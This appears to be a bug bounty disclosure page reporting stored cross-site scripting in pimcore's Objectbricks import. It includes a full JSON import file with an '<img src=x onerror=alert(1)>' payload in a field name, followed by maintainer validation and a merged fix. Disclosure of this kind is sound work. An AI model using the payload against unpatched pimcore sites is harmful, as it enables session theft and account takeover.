Cross-site Scripting (XSS) - Stored in pimcore/pimcore

Valid

Reported on

Dec 21st 2021


Description

pimcore is vulnerable to Stored Cross-Site Scripting in the name field via the import functionality.

Steps to reproduce:

  1. Navigate to settings --> Data Objects --> Objectbricks
  2. ave the following data as JSON file and import it:
{
    "classDefinitions": [],
    "key": null,
    "parentClass": null,
    "implementsInterfaces": null,
    "title": "",
    "group": "",
    "layoutDefinitions": {
        "fieldtype": "panel",
        "layout": null,
        "border": false,
        "name": null,
        "type": null,
        "region": null,
        "title": null,
        "width": 0,
        "height": 0,
        "collapsible": false,
        "collapsed": false,
        "bodyStyle": null,
        "datatype": "layout",
        "permissions": null,
        "childs": [
            {
                "fieldtype": "panel",
                "layout": null,
                "border": false,
                "name": "aa",
                "type": null,
                "region": null,
                "title": "",
                "width": null,
                "height": null,
                "collapsible": false,
                "collapsed": false,
                "bodyStyle": "",
                "datatype": "layout",
                "permissions": null,
                "childs": [
                    {
                        "fieldtype": "numeric",
                        "width": "",
                        "defaultValue": null,
                        "queryColumnType": "double",
                        "columnType": "double",
                        "integer": true,
                        "unsigned": true,
                        "minValue": null,
                        "maxValue": null,
                        "unique": false,
                        "decimalSize": null,
                        "decimalPrecision": null,
                        "name": "<img src=x onerror=alert(1)>",
                        "title": "",
                        "tooltip": "",
                        "mandatory": false,
                        "noteditable": false,
                        "index": false,
                        "locked": false,
                        "style": "",
                        "permissions": null,
                        "datatype": "data",
                        "relationType": false,
                        "invisible": false,
                        "visibleGridView": false,
                        "visibleSearch": false,
                        "defaultValueGenerator": ""
                    },
                    {
                        "fieldtype": "numeric",
                        "width": "",
                        "defaultValue": null,
                        "queryColumnType": "double",
                        "columnType": "double",
                        "integer": true,
                        "unsigned": true,
                        "minValue": null,
                        "maxValue": null,
                        "unique": false,
                        "decimalSize": null,
                        "decimalPrecision": null,
                        "name": "numberOfSeats",
                        "title": "Number Of Seats",
                        "tooltip": "",
                        "mandatory": false,
                        "noteditable": false,
                        "index": false,
                        "locked": false,
                        "style": "",
                        "permissions": null,
                        "datatype": "data",
                        "relationType": false,
                        "invisible": false,
                        "visibleGridView": false,
                        "visibleSearch": false,
                        "defaultValueGenerator": ""
                    },
                    {
                        "fieldtype": "quantityValue",
                        "width": null,
                        "unitWidth": null,
                        "defaultValue": null,
                        "defaultUnit": "4",
                        "validUnits": [
                            "4"
                        ],
                        "decimalPrecision": null,
                        "autoConvert": false,
                        "queryColumnType": {
                            "value": "double",
                            "unit": "varchar(64)"
                        },
                        "columnType": {
                            "value": "double",
                            "unit": "varchar(64)"
                        },
                        "name": "cargoCapacity",
                        "title": "Cargo Capacity",
                        "tooltip": "",
                        "mandatory": false,
                        "noteditable": false,
                        "index": false,
                        "locked": false,
                        "style": "",
                        "permissions": null,
                        "datatype": "data",
                        "relationType": false,
                        "invisible": false,
                        "visibleGridView": false,
                        "visibleSearch": false,
                        "defaultValueGenerator": ""
                    }
                ],
                "locked": false,
                "icon": null,
                "labelWidth": 100,
                "labelAlign": "left"
            }
        ],
        "locked": false,
        "icon": null,
        "labelWidth": 100,
        "labelAlign": "left"
    },
    "generateTypeDeclarations": false
}
  1. you will notice that the XSS alert has been triggered.

Payload

<img src=x onerror=alert(0)>

Impact

This vulnerability is capable of stealing users' cookies and gaining full account take over through his credentials and redirecting the user to a malicious website.

We are processing your report and will contact the pimcore team within 24 hours. 5 months ago
We have contacted a member of the pimcore team and are waiting to hear back 5 months ago
We have sent a follow up to the pimcore team. We will try again in 7 days. 5 months ago
itsfading
5 months ago

Researcher


any updates?

We have sent a second follow up to the pimcore team. We will try again in 10 days. 5 months ago
We have sent a third and final follow up to the pimcore team. This report is now considered stale. 5 months ago
Bernhard Rusch validated this vulnerability 4 months ago
itsfading has been awarded the disclosure bounty
The fix bounty is now up for grabs
Josef Aichhorn
4 months ago

Maintainer


PR is in the queue: https://github.com/pimcore/pimcore/pull/11217

Divesh Pahuja confirmed that a fix has been merged on 3ae96b 4 months ago
Divesh Pahuja has been awarded the fix bounty
Service.php#L228-L249 has been validated
to join this conversation